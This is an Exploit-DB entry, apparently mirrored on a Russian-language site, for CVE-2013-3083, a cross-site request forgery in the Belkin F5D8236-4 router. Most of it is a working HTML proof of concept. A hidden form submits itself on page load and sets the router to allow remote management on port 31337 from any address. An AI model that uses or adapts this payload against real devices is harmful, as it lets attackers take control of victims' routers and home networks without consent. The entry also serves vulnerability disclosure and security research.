- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38495
- Проверка EDB
-
- Пройдено
- Автор
- JACOB HOLCOMB
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2013-3083
- Дата публикации
- 2013-04-25
Belkin F5D8236-4 Router - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/59476/info
Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>- Источник
- www.exploit-db.com
